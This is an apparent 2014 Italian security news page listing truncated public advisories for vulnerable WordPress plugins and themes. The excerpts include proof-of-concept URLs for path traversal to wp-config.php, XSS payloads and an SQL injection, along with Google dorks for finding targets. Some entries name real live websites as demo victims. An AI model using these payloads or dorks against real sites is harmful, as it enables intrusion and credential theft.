WordPress WPtouch Mobile 3.4.5 Shell Upload

27 agosto 2014 - Fonte: http://www.mondounix.com
Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/...

Leggi il seguito »

WordPress KenBurner Slider Arbitrary File Download

26 agosto 2014 - Fonte: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...

Leggi il seguito »

WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 agosto 2014 - Fonte: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...

Leggi il seguito »

WordPress 2.77 CSRF

17 agosto 2014 - Fonte: http://www.mondounix.com
Disqus for Wordpress
https://wordpress.org/plugins/disqus-comment-system
Version affected: up to v2.77
 
CSRF allows for activation and deactivation of the plugin and syncing comments between Disqus servers and the WP 
database.
They supposedly just fixed the CSRF issues. Ugh. Sorry Nik. Even when you tell them about nonces they still don't get 
it right.
 
More details can be found here:
https://vexatioustendencies.com/csrf-in-disqus-wordpress-plugin-v2-77/

(5)

...

Leggi il seguito »

WordPress MyBand Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...

Leggi il seguito »

WordPress Gamespeed Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...

Leggi il seguito »

WordPress SI CAPTCHA Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress SI CAPTCHA Anti-Spam Plugin Cross  
site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork:  
inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...

Leggi il seguito »

WordPress GB Gallery Slideshow 1.5 SQL Injection

14 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress GB Gallery Slideshow 1.5 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://gb-plugins.com/
 
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
 
# Date : 2014-08-09
 
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
        Linux / Mozilla Firefox
 
######################
 
# Location :  
http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
 
######################
 
# Vulnerable code :
 
    if(isset($_POST['selected_group'])){
        global $gb_post_type, $gb_group_table, $wpdb;
        $my_group_id = $_POST['selected_group'];
    ...

Leggi il seguito »

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 agosto 2014 - Fonte: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...

Leggi il seguito »

WordPress WPSS 0.62 Cross Site Scripting

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
...

Leggi il seguito »